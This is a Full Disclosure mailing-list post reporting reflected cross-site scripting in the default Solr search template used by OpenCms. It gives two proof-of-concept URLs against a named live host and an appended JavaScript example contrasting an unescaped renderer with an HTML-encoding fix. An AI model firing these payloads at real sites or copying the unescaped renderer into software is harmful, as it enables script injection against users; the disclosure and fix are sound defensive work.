Hello, the default search template for solr is prone to XSS, because nobody validated the input.

PoC:
http://find.searchhub.org/?q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E
http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E

This is also valid for any opencms website that uses the solr search, e.g. the default opencms search template based on solr in opencms version 9.

E.g. point your browser to http://localhost:8080/opencms/opencms/demo/search-page/ and search for
<img src='http://c.s-microsoft.com/nl-nl/CMSImages/mslogo.png?version=856673f8-e6be-0476-6669-d5bf2300391d'>

That might not be a solr issue, but an implementation one.

Regards.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
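
Added example, not part of the original post and not Solr or OpenCms code: a hypothetical search-results renderer that reflects the q parameter, shown once without output encoding and once with it, run against the two query strings from the PoC URLs above. The function names and the h2/input template are assumptions made for illustration.

```javascript
// Query strings copied from the two PoC URLs in the post (host omitted).
const POC_QUERIES = [
  "q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E",
  "q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E",
];

// Hypothetical helper: HTML-encode the five characters that can change the
// parsing context in element content or in a quoted attribute value.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Before: the decoded search term is concatenated into the page as-is.
function renderUnsafe(queryString) {
  const q = new URLSearchParams(queryString).get("q") ?? "";
  return `<h2>Results for ${q}</h2><input name="q" value="${q}">`;
}

// After: the same (assumed) template with the term encoded at output time.
function renderSafe(queryString) {
  const q = new URLSearchParams(queryString).get("q") ?? "";
  const safe = escapeHtml(q);
  return `<h2>Results for ${safe}</h2><input name="q" value="${safe}">`;
}

// True when the rendered page contains any tag other than the template's own.
function containsInjectedTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][a-zA-Z0-9]*/g) || [];
  return tags.some((t) => !["<h2", "</h2", "<input"].includes(t.toLowerCase()));
}

for (const qs of POC_QUERIES) {
  console.log("unsafe:", containsInjectedTag(renderUnsafe(qs)),
              "safe:", containsInjectedTag(renderSafe(qs)));
}
```

The encoding is applied where the value is written into HTML, so the stored or logged search term stays unchanged and the same check can be used as a regression test for a search template.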
